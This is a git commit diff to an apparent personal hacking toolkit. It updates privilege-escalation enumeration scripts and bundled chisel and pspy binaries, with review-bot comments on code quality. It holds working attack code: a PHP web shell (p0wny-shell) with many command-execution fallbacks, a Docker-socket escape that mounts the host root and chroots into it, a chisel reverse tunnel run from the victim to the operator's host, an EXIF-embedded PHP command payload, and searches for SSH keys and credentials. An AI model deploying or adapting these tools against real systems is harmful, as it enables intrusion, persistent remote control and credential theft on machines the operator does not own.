
Update Dependencies + paramiko port forwarding + some bug fixes

Roman Hergenreder 7 months ago
parent
commit
b1380967a4
18 changed files with 393 additions and 141 deletions
  1. 6 0
      README.md
  2. BIN
      chisel
  3. BIN
      chisel64
  4. 18 3
      deepce.sh
  5. 2 23
      fileserver.py
  6. 79 71
      linpeas.sh
  7. 1 1
      linux-exploit-suggester.sh
  8. 5 4
      lse.sh
  9. 125 31
      p0wny-shell.php
  10. BIN
      pspy
  11. BIN
      pspy64
  12. 104 0
      rev_shell.py
  13. 42 5
      uptux.py
  14. BIN
      win/chisel.exe
  15. BIN
      win/chisel64.exe
  16. 11 3
      win/winPEAS.bat
  17. BIN
      win/winPEAS.exe
  18. BIN
      win/winPEASx64.exe

+ 6 - 0
README.md

@@ -2,6 +2,12 @@
 
 This repository contains self-made and common scripts for information gathering, enumeration and more.
 
+### Installation
+```bash
+git clone git@romanh.de:Roman/HackingScripts
+sudo ln -s HackingScripts $(python -c "import sys;print(sys.path[-1])")/hackingscripts
+```
+
 ### Enumeration: Initial Scans
 - first_scan.sh: Performs initial nmap scan
 - gobuster.sh: Performs gobuster dir scan with raft-large-words-lowercase.txt

BIN
chisel


BIN
chisel64


+ 18 - 3
deepce.sh

@@ -129,7 +129,7 @@ TIP_CVE_2019_5736="Docker versions before 18.09.2 are vulnerable to a container
 TIP_SYS_MODULE="Giving the container the SYS_MODULE privilege allows for kernel modules to be mounted. Using this, a malicious module can be used to execute code as root on the host."
 
 DANGEROUS_GROUPS="docker\|lxd\|root\|sudo\|wheel"
-DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override"
+DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override\|cap_sys_rawio\|cap_mknod"
 
 CONTAINER_CMDS="docker lxc rkt kubectl podman"
 USEFUL_CMDS="curl wget gcc nc netcat ncat jq nslookup host hostname dig python python2 python3 nmap"
@@ -561,7 +561,13 @@ containerCapabilities() {
         printNo
     fi
   else
-    printError "Unknown (capsh not installed)"
+    caps=$(grep Cap /proc/self/status)
+    capEff=$(grep CapEff /proc/self/status | cut -d ':' -f 2 | tr -d '\t')
+    printError "capsh not installed, listing raw capabilities"
+    printInstallAdvice "libcap2-bin"
+    printStatus "Current capabilities are:"
+    printStatus "$caps"
+    printStatus "> This can be decoded with: \"capsh --decode=${capEff}\""
   fi
 }
 
@@ -1046,9 +1052,18 @@ exploitDockerSock() {
 
   nl
 
+  # Try to find an available docker image
+  json_data=$(curl -s --unix-socket /var/run/docker.sock http://localhost/images/json)
+  docker_img=$(echo "$json_data" | grep -o '"RepoTags":\["[^"]*' | grep -o '[^"]*$' | tail -1)
+
+  if [ -z "$docker_img" ]; then
+    printInfo 'No avaliable docker image found, using alpine'
+    docker_img="alpine" 
+  fi 
+
   # Create docker container using the docker sock
   payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$cmd\\\"\"]"
-  response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"alpine\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
+  response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"$docker_img\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
 
   if ! [ $? ]; then
     printError 'Something went wrong'

+ 2 - 23
fileserver.py

@@ -137,7 +137,6 @@ class HttpFileServer(HTTPServer):
         self.prefix_routes = { }
         self.is_running = True
         self.listen_thread = None
-        self.has_exited = False
 
     def cleanPath(self, path):
 
@@ -231,9 +230,6 @@ class HttpFileServer(HTTPServer):
         self.listen_thread.start()
         return self.listen_thread
 
-    def start(self):
-        return self.serve_forever()
-
     def get_base_url():
         addr, port = self.server_address
         if port != 80:
@@ -243,28 +239,11 @@ class HttpFileServer(HTTPServer):
 
     def stop(self):
         self.is_running = False
-        time.sleep(1)
-
-        try:
-            # dummy request
-            for i in range(3):
-                requests.get(f"{self.get_base_url()}/dummy")
-                if self.has_exited:
-                    break
-                time.sleep(1)
-        except:
-            pass
-
+        time.sleep(1)       
+        self.shutdown()
         if self.listen_thread != threading.currentThread():
             self.listen_thread.join()
 
-    def serve_forever(self):
-        self.has_exited = False
-        while self.is_running:
-            self.handle_request()
-        self.has_exited = True
-
-
 if __name__ == "__main__":
     if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy","xss"]:
         print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0])
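Review bot: `self.shutdown()` in the new `stop()` is called unconditionally, but socketserver's `shutdown()` blocks until `serve_forever()` returns, so when `stop()` runs on the serving thread itself (the case the `threading.currentThread()` check just below is there for) it deadlocks; the thread guard has to cover the `shutdown()` call as well as the `join()`. The guard also assumes `listen_thread` was set by `start_background()`; when the server was run with `serve_forever()` directly it is still `None`, `None != currentThread()` is true, and `None.join()` raises `AttributeError`. I would write the tail as `if self.listen_thread is not None and self.listen_thread is not threading.current_thread():` followed by `self.shutdown()` and `self.listen_thread.join()` (`current_thread()` is the non-deprecated spelling), and handle the same-thread case without a blocking call. With the `serve_forever` override removed, `is_running` appears to be write-only in this file unless something outside the hunk reads it.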

File diff suppressed because it is too large
+ 79 - 71
linpeas.sh


+ 1 - 1
linux-exploit-suggester.sh

@@ -1,7 +1,7 @@
 #!/bin/bash
 
 #
-# Copyright (c) 2016-2022, @_mzet_
+# Copyright (c) 2016-2023, https://github.com/mzet-
 #
 # linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
 # This is free software, and you are welcome to redistribute it

+ 5 - 4
lse.sh

@@ -5,7 +5,7 @@
 # Author: Diego Blanco <diego.blanco@treitos.com>
 # GitHub: https://github.com/diego-treitos/linux-smart-enumeration
 #
-lse_version="4.10nw"
+lse_version="4.13nw"
 
 ##( Colors
 #
@@ -611,6 +611,7 @@ lse_get_distro_codename() { #(
   elif [ -f /etc/os-release ]; then
     distro=`grep -E '^ID=' /etc/os-release | cut -f2 -d=`
     echo "$distro" | grep -qi opensuse && distro=opsuse
+    echo "$distro" | grep -qi rhel && distro=redhat
   elif [ -f /etc/redhat-release ]; then
     grep -qi "centos"  /etc/redhat-release && distro=centos
     grep -qi "fedora"  /etc/redhat-release && distro=fedora
@@ -635,7 +636,7 @@ lse_get_pkg_version() { #(
   pkg_name="$1"
   case "$lse_distro_codename" in
     debian|ubuntu)
-      pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^ii' | tr -s ' ' | cut -d' ' -f3`
+      pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^[ih]i' | tr -s ' ' | cut -d' ' -f3`
       ;;
     centos|redhat|fedora|opsuse|rocky|amzn)
       pkg_version=`rpm -q "$pkg_name" 2>/dev/null`
@@ -845,7 +846,7 @@ lse_run_tests_filesystem() {
   #looking for credentials in /etc/fstab and /etc/mtab
   lse_test "fst120" "0" \
     "Are there any credentials in fstab/mtab?" \
-    'grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab'
+    'grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials|cred)[=:]" /etc/fstab /etc/mtab'
 
   #check if current user has mail
   lse_test "fst130" "1" \
@@ -910,7 +911,7 @@ lse_run_tests_filesystem() {
   #check for SSH files anywhere
   lse_test "fst510" "2" \
     "SSH files anywhere" \
-    'find / $lse_find_opts \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;'
+    'find / $lse_find_opts \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "*id_ecdsa*" -o -name "*id_ed25519*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;'
 
   #dump hosts.equiv file
   lse_test "fst520" "2" \

+ 125 - 31
p0wny-shell.php

@@ -1,5 +1,10 @@
 <?php
 
+$SHELL_CONFIG = array(
+    'username' => 'p0wny',
+    'hostname' => 'shell',
+);
+
 function expandPath($path) {
     if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) {
         exec("echo $match[1]", $stdout);
@@ -8,8 +13,52 @@ function expandPath($path) {
     return $path;
 }
 
+function allFunctionExist($list = array()) {
+    foreach ($list as $entry) {
+        if (!function_exists($entry)) {
+            return false;
+        }
+    }
+    return true;
+}
+
+function executeCommand($cmd) {
+    $output = '';
+    if (function_exists('exec')) {
+        exec($cmd, $output);
+        $output = implode("\n", $output);
+    } else if (function_exists('shell_exec')) {
+        $output = shell_exec($cmd);
+    } else if (allFunctionExist(array('system', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) {
+        ob_start();
+        system($cmd);
+        $output = ob_get_contents();
+        ob_end_clean();
+    } else if (allFunctionExist(array('passthru', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) {
+        ob_start();
+        passthru($cmd);
+        $output = ob_get_contents();
+        ob_end_clean();
+    } else if (allFunctionExist(array('popen', 'feof', 'fread', 'pclose'))) {
+        $handle = popen($cmd, 'r');
+        while (!feof($handle)) {
+            $output .= fread($handle, 4096);
+        }
+        pclose($handle);
+    } else if (allFunctionExist(array('proc_open', 'stream_get_contents', 'proc_close'))) {
+        $handle = proc_open($cmd, array(0 => array('pipe', 'r'), 1 => array('pipe', 'w')), $pipes);
+        $output = stream_get_contents($pipes[1]);
+        proc_close($handle);
+    }
+    return $output;
+}
+
+function isRunningWindows() {
+    return stripos(PHP_OS, "WIN") === 0;
+}
+
 function featureShell($cmd, $cwd) {
-    $stdout = array();
+    $stdout = "";
 
     if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) {
         chdir(expandPath("~"));
@@ -23,17 +72,17 @@ function featureShell($cmd, $cwd) {
         return featureDownload($match[1]);
     } else {
         chdir($cwd);
-        exec($cmd, $stdout);
+        $stdout = executeCommand($cmd);
     }
 
     return array(
-        "stdout" => $stdout,
-        "cwd" => getcwd()
+        "stdout" => base64_encode($stdout),
+        "cwd" => base64_encode(getcwd())
     );
 }
 
 function featurePwd() {
-    return array("cwd" => getcwd());
+    return array("cwd" => base64_encode(getcwd()));
 }
 
 function featureHint($fileName, $cwd, $type) {
@@ -45,6 +94,9 @@ function featureHint($fileName, $cwd, $type) {
     }
     $cmd = "/bin/bash -c \"$cmd\"";
     $files = explode("\n", shell_exec($cmd));
+    foreach ($files as &$filename) {
+        $filename = base64_encode($filename);
+    }
     return array(
         'files' => $files,
     );
@@ -54,12 +106,12 @@ function featureDownload($filePath) {
     $file = @file_get_contents($filePath);
     if ($file === FALSE) {
         return array(
-            'stdout' => array('File not found / no read permission.'),
-            'cwd' => getcwd()
+            'stdout' => base64_encode('File not found / no read permission.'),
+            'cwd' => base64_encode(getcwd())
         );
     } else {
         return array(
-            'name' => basename($filePath),
+            'name' => base64_encode(basename($filePath)),
             'file' => base64_encode($file)
         );
     }
@@ -70,19 +122,40 @@ function featureUpload($path, $file, $cwd) {
     $f = @fopen($path, 'wb');
     if ($f === FALSE) {
         return array(
-            'stdout' => array('Invalid path / no write permission.'),
-            'cwd' => getcwd()
+            'stdout' => base64_encode('Invalid path / no write permission.'),
+            'cwd' => base64_encode(getcwd())
         );
     } else {
         fwrite($f, base64_decode($file));
         fclose($f);
         return array(
-            'stdout' => array('Done.'),
-            'cwd' => getcwd()
+            'stdout' => base64_encode('Done.'),
+            'cwd' => base64_encode(getcwd())
         );
     }
 }
 
+function initShellConfig() {
+    global $SHELL_CONFIG;
+
+    if (isRunningWindows()) {
+        $username = getenv('USERNAME');
+        if ($username !== false) {
+            $SHELL_CONFIG['username'] = $username;
+        }
+    } else {
+        $pwuid = posix_getpwuid(posix_geteuid());
+        if ($pwuid !== false) {
+            $SHELL_CONFIG['username'] = $pwuid['name'];
+        }
+    }
+
+    $hostname = gethostname();
+    if ($hostname !== false) {
+        $SHELL_CONFIG['hostname'] = $hostname;
+    }
+}
+
 if (isset($_GET["feature"])) {
 
     $response = NULL;
@@ -108,6 +181,8 @@ if (isset($_GET["feature"])) {
     header("Content-Type: application/json");
     echo json_encode($response);
     die();
+} else {
+    initShellConfig();
 }
 
 ?><!DOCTYPE html>
@@ -125,6 +200,9 @@ if (isset($_GET["feature"])) {
                 background: #333;
                 color: #eee;
                 font-family: monospace;
+                width: 100vw;
+                height: 100vh;
+                overflow: hidden;
             }
 
             *::-webkit-scrollbar-track {
@@ -145,17 +223,21 @@ if (isset($_GET["feature"])) {
 
             #shell {
                 background: #222;
-                max-width: 800px;
-                margin: 50px auto 0 auto;
                 box-shadow: 0 0 5px rgba(0, 0, 0, .3);
                 font-size: 10pt;
                 display: flex;
                 flex-direction: column;
                 align-items: stretch;
+                max-width: calc(100vw - 2 * var(--shell-margin));
+                max-height: calc(100vh - 2 * var(--shell-margin));
+                resize: both;
+                overflow: hidden;
+                width: 100%;
+                height: 100%;
+                margin: var(--shell-margin) auto;
             }
 
             #shell-content {
-                height: 500px;
                 overflow: auto;
                 padding: 5px;
                 white-space: pre-wrap;
@@ -168,20 +250,27 @@ if (isset($_GET["feature"])) {
                 text-align: center;
             }
 
-            @media (max-width: 991px) {
+            :root {
+                --shell-margin: 25px;
+            }
+
+            @media (min-width: 1200px) {
+                :root {
+                    --shell-margin: 50px !important;
+                }
+            }
+
+            @media (max-width: 991px),
+                   (max-height: 600px) {
                 #shell-logo {
                     font-size: 6px;
                     margin: -25px 0;
                 }
-
-                html, body, #shell {
-                    height: 100%;
-                    width: 100%;
-                    max-width: none;
+                :root {
+                    --shell-margin: 0 !important;
                 }
-
                 #shell {
-                    margin-top: 0;
+                    resize: none;
                 }
             }
 
@@ -210,6 +299,7 @@ if (isset($_GET["feature"])) {
                 display: flex;
                 box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);
                 border-top: rgba(255, 255, 255, .05) solid 1px;
+                padding: 10px 0;
             }
 
             #shell-input > label {
@@ -230,6 +320,7 @@ if (isset($_GET["feature"])) {
                 font-size: 10pt;
                 width: 100%;
                 align-self: center;
+                box-sizing: border-box;
             }
 
             #shell-input div {
@@ -243,6 +334,7 @@ if (isset($_GET["feature"])) {
         </style>
 
         <script>
+            var SHELL_CONFIG = <?php echo json_encode($SHELL_CONFIG); ?>;
             var CWD = null;
             var commandHistory = [];
             var historyPosition = 0;
@@ -277,10 +369,10 @@ if (isset($_GET["feature"])) {
                 } else {
                     makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function (response) {
                         if (response.hasOwnProperty('file')) {
-                            featureDownload(response.name, response.file)
+                            featureDownload(atob(response.name), response.file)
                         } else {
-                            _insertStdout(response.stdout.join("\n"));
-                            updateCwd(response.cwd);
+                            _insertStdout(atob(response.stdout));
+                            updateCwd(atob(response.cwd));
                         }
                     });
                 }
@@ -291,7 +383,9 @@ if (isset($_GET["feature"])) {
 
                 function _requestCallback(data) {
                     if (data.files.length <= 1) return;  // no completion
-
+                    data.files = data.files.map(function(file){
+                        return atob(file);
+                    });
                     if (data.files.length === 2) {
                         if (type === 'cmd') {
                             eShellCmdInput.value = data.files[0];
@@ -341,8 +435,8 @@ if (isset($_GET["feature"])) {
                     var promise = getBase64(element.files[0]);
                     promise.then(function (file) {
                         makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {
-                            _insertStdout(response.stdout.join("\n"));
-                            updateCwd(response.cwd);
+                            _insertStdout(atob(response.stdout));
+                            updateCwd(atob(response.cwd));
                         });
                     }, function () {
                         _insertStdout('An unknown client-side error occurred.');
@@ -368,7 +462,7 @@ if (isset($_GET["feature"])) {
                     var splittedCwd = cwd.split("/");
                     shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1];
                 }
-                return "p0wny@shell:<span title=\"" + cwd + "\">" + shortCwd + "</span>#";
+                return SHELL_CONFIG["username"] + "@" + SHELL_CONFIG["hostname"] + ":<span title=\"" + cwd + "\">" + shortCwd + "</span>#";
             }
 
             function updateCwd(cwd) {
@@ -378,7 +472,7 @@ if (isset($_GET["feature"])) {
                     return;
                 }
                 makeRequest("?feature=pwd", {}, function(response) {
-                    CWD = response.cwd;
+                    CWD = atob(response.cwd);
                     _updatePrompt();
                 });
 

BIN
pspy


BIN
pspy64


+ 104 - 0
rev_shell.py

@@ -11,6 +11,13 @@ import threading
 import paramiko
 import readline
 import base64
+import select
+
+
+try:
+    import SocketServer
+except ImportError:
+    import socketserver as SocketServer
 
 class ShellListener:
 
@@ -162,6 +169,97 @@ class ShellListener:
         if permissions:
             self.sendline(f"chmod {permissions} {path}")
 
+class ParamikoTunnelServer(SocketServer.ThreadingTCPServer):
+    daemon_threads = True
+    allow_reuse_address = True
+
+
+class ParamikoTunnel:
+    def __init__(self, shell, ports):
+        self.shell = shell
+        self.ports = ports
+        self.verbose = False
+        self.is_running = True
+        self.on_message = []
+        self.listen_threads = []
+        self.servers = []
+
+    def start_background(self):
+        for port in self.ports:
+            thread = threading.Thread(target=self.start, args=(port, ))
+            thread.start()
+            self.listen_threads.append(thread)
+        return self.listen_threads
+
+    def start(self, port):
+        this = self
+        class SubHandler(ParamikoTunnelHandler):
+            peer = this.shell.get_transport().sock.getpeername()
+            chain_host = "127.0.0.1"
+            chain_port = port
+            ssh_transport = this.shell.get_transport()
+            def log(self, message):
+                if this.verbose:
+                    print(message)
+
+        forward_server = ParamikoTunnelServer(("127.0.0.1", port), SubHandler)
+        self.servers.append(forward_server)
+        forward_server.serve_forever()
+
+    def close(self):
+        self.is_running = False
+        for server in self.servers:
+            server._BaseServer__shutdown_request = True
+        for thread in self.listen_threads:
+            thread.join()
+
+class ParamikoTunnelHandler(SocketServer.BaseRequestHandler):
+    def handle(self):
+        try:
+            chan = self.ssh_transport.open_channel(
+                "direct-tcpip",
+                (self.chain_host, self.chain_port),
+                self.request.getpeername(),
+            )
+        except Exception as e:
+            self.log(
+                "Incoming request to %s:%d failed: %s"
+                % (self.chain_host, self.chain_port, repr(e))
+            )
+            return
+        if chan is None:
+            self.log(
+                "Incoming request to %s:%d was rejected by the SSH server."
+                % (self.chain_host, self.chain_port)
+            )
+            return
+
+        self.log(
+            "Connected!  Tunnel open %r -> %r -> %r"
+            % (
+                self.request.getpeername(),
+                chan.getpeername(),
+                (self.chain_host, self.chain_port),
+            )
+        )
+        while True:
+            r, w, x = select.select([self.request, chan], [], [])
+            if self.request in r:
+                data = self.request.recv(1024)
+                if len(data) == 0:
+                    break
+                chan.send(data)
+            if chan in r:
+                data = chan.recv(1024)
+                if len(data) == 0:
+                    break
+                self.request.send(data)
+
+        peername = self.request.getpeername()
+        chan.close()
+        self.request.close()
+        self.log("Tunnel closed from %r" % (peername,))
+
 def generate_payload(type, local_address, port, index=None):
 
     commands = []
@@ -238,7 +336,13 @@ def create_tunnel(shell, ports: list):
         t.start()
 
         shell.sendline(f"/tmp/chisel64 client --max-retry-count 1 {ipAddress}:{chiselPort} {ports} 2>&1 >/dev/null &")
+        return t
     elif isinstance(shell, paramiko.SSHClient):
+
+        paramiko_tunnel = ParamikoTunnel(shell, ports)
+        paramiko_tunnel.start_background()
+        return paramiko_tunnel
+
         # TODO: https://github.com/paramiko/paramiko/blob/88f35a537428e430f7f26eee8026715e357b55d6/demos/forward.py#L103
         pass
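Review bot: `ParamikoTunnel.close()` stops the servers by flipping socketserver's name-mangled `_BaseServer__shutdown_request` attribute, which is an implementation detail of `BaseServer` and may change between Python versions; the public `server.shutdown()` does the same and is safe here because every `serve_forever()` runs in its own thread started by `start_background()`, so the loop body should be `server.shutdown()`. In the `create_tunnel` hunk, the `# TODO` comment and `pass` are left behind after the new `return paramiko_tunnel` and are now unreachable; drop them or move the note above the return. `create_tunnel` starts outside the hunk.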
 

+ 42 - 5
uptux.py

@@ -1,7 +1,9 @@
 #!/usr/bin/env python
 
 import random
+import math
 import socket
+import itertools
 import netifaces as ni
 import string
 import sys
@@ -44,15 +46,20 @@ def exit_with_error(res, err):
     exit()
 
 def assert_status_code(res, status_code, err=None):
-    if res.status_code != status_code:
+    if type(status_code) == int and res.status_code != status_code:
         err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected: {status_code}" if err is None else err
         exit_with_error(res, err)
+    elif hasattr(status_code, '__iter__') and res.status_code not in status_code:
+        err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected one of: {','.join(status_code)}" if err is None else err
+        exit_with_error(res, err)
 
-def assert_header_present(res, header, err=None):
-    if header in res.headers:
+def assert_location(res, location, err=None):
+    assert_header_present(res, "Location")
+    location_header = res.headers["Location"].lower()
+    if location_header == location.lower():
         return
-        
-    err = f"[-] '{res.url}' did not return header: {header}" if err is None else err
+
+    err = f"[-] '{res.url}' returned unexpected location {location_header}, expected: {location}" if err is None else err
     exit_with_error(res, err)
 
 def assert_content_type(res, content_type, err=None):
@@ -66,6 +73,13 @@ def assert_content_type(res, content_type, err=None):
     err = f"[-] '{res.url}' returned unexpected content type {content_type_header}, expected: {content_type}" if err is None else err
     exit_with_error(res, err)
 
+def assert_header_present(res, header, err=None):
+    if header in res.headers:
+        return
+        
+    err = f"[-] '{res.url}' did not return header: {header}" if err is None else err
+    exit_with_error(res, err)
+
 def openServer(address, ports=None):
     listenPort = None
     retry = True
@@ -149,6 +163,29 @@ def pad(x, n):
         x  += (n-(len(x)%n))*b"\x00"
     return x
 
+def xor(a, b):
+    if len(a) == 0 or len(b) == 0:
+        return a
+
+    if len(a) < len(b):
+        a *= int(math.ceil((len(b)/len(a))))
+        a = a[0:len(b)]
+    elif len(b) < len(a):
+        b *= int(math.ceil((len(a)/len(b))))
+        b = b[0:len(a)]
+
+    if type(a) == str and type(b) == str:
+        return "".join([chr(ord(c1) ^ ord(c2)) for (c1,c2) in zip(a, b) ])
+    else:
+        if type(a) != bytes:
+            a = a.encode()
+        if type(b) != bytes:
+            b = b.encode()
+
+        
+
+    return b"".join([bytes([c1 ^ c2]) for (c1,c2) in zip(a, b) ])
+
 def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None):
     import exif
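Review bot: In the `assert_status_code` hunk, the iterable branch builds its message with `','.join(status_code)`, which raises `TypeError` when `status_code` is a list of ints (the case that branch exists for), so the failing request is reported as a crash instead of the intended message; use `', '.join(map(str, status_code))`. The `type(status_code) == int` check should be `isinstance(status_code, int)`, and `hasattr(status_code, '__iter__')` also accepts a `str`, where `in` would do a substring test; narrowing to `(list, tuple, set)` is safer. The three blank lines inside `xor` between the `else` branch and the final `return` read like a forgotten edit and are worth removing.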
 

BIN
win/chisel.exe


BIN
win/chisel64.exe


+ 11 - 3
win/winPEAS.bat

@@ -10,6 +10,14 @@ REM Registry scan of other drives besides
 REM /////true or false
 SET long=false
 
+REM Check if the current path contains spaces
+SET "CurrentFolder=%~dp0"
+IF "!CurrentFolder!" NEQ "!CurrentFolder: =!" (
+    ECHO winPEAS.bat cannot run if the current path contains spaces.
+	ECHO Exiting.
+    EXIT /B 1
+)
+
 :Splash
 ECHO.
 CALL :ColorLine "            %E%32m((,.,/((((((((((((((((((((/,  */%E%97m"
@@ -52,7 +60,7 @@ CALL :ColorLine "   %E%41mUse it at your own networks and/or with the network ow
 ECHO.
 
 :SystemInfo
-CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO
+CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO"
 CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS"
 ECHO.   [i] Check for vulnerabilities for the OS version with the applied patches
 ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
@@ -404,7 +412,7 @@ CALL :T_Progress 1
 
 :CurrentClipboard
 CALL :ColorLine " %E%33m[+]%E%97m CURRENT CLIPBOARD"
-ECHO.   [i] Any password inside the clipboard?
+ECHO.   [i] Any passwords inside the clipboard?
 powershell -command "Get-Clipboard" 2>nul
 ECHO.
 CALL :T_Progress 1
@@ -565,7 +573,7 @@ CALL :T_Progress 2
 
 :AppCMD
 CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe
+ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
 IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists. 
 ECHO.
 CALL :T_Progress 2
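Review bot: The space check in the first hunk compares `"!CurrentFolder!"` with `"!CurrentFolder: =!"` using delayed-expansion syntax; if `SETLOCAL EnableDelayedExpansion` is not in effect at that point (the file header is outside the hunk, so I cannot confirm it), both sides are literal `!...!` strings that always differ and the script exits unconditionally. Either make sure delayed expansion is enabled before this block or use `%CurrentFolder%` / `%CurrentFolder: =%`, e.g. `IF "%CurrentFolder%" NEQ "%CurrentFolder: =%" (`. The second `ECHO Exiting.` line is indented with a tab while its neighbours use spaces.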

BIN
win/winPEAS.exe


BIN
win/winPEASx64.exe

